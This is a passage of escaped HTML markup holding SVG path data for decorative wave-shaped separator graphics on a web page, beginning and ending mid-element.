d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n        <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n        <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n        <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n        <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n        <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n        <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n        <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n        <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n        <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n        <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n        <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n        <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n        <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n        <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n        <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n        <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n        <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n        <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n        <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n        <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n        <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n        <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n        <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n        <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n        <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n        <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n        <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n        <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n        <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n        <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n        <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n        <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n        <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n        <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n        <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n        <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n        <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n        <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n        <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n        <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n        <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n        <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n        <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n        <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n        <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n        <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n        <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n        <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n        <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n        <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n        <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n        <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n        <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n        <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n        <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n        <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n        <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n        <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n        <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n        <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n        <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n        <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n        <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n        <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n        <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n      </svg>\n    </div>\n    <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n      <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n        <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n          transform=\"translate(0 0)\"></path>\n        <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n        <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path d=\"M1048.36,50.39a132.31,132.31,0,0,1-17.87,1.43c-8-.06-16-.76-23.94-1.35-6.42-.48-12.86-.91-19.21-1.87s-12.83,2.07-19-1.37c-2.08-1.15-4.82-1-7.19-1.72-5.73-1.65-11.41-3.46-17.13-5.15-4.34-1.28-8.72-2.44-13.07-3.7q-10.73-3.1-21.41-6.26c0,.49.11,1,.17,1.49l.15.16,4.5,2.05c8.53-.06,15.79,4.83,23.95,6.26a9.88,9.88,0,0,1,2.6,1.37l2.1.53c2.58.87,5.12,1.93,7.75,2.59,4.42,1.1,9,1.64,13.34,3,3.34,1.06,6.4,3,9.58,4.56l1.92.11c1.35-1.93,2.77-3.19,4.72-.6.24.31,1,.67,1.14.54,4.17-3,8.46,1.9,12.67-.18.41-.2,1.27.58,1.94.85s1.3.73,1.71.55c6.17-2.8,12-1.76,17.88,1.09,1.64.8,3.9.31,5.58,1,3.35,1.49,5.58.32,8.39-1.6,1.63-1.11,4.73-.09,7.16,0,.88,0,2,.42,2.58,0,3.47-2.14,7.39-1.74,11.14-2.29,2-1,5-.17,5.46-3.49l-2.17-.72C1052,48.66,1050.24,50.15,1048.36,50.39Z\"\n          transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n        <path 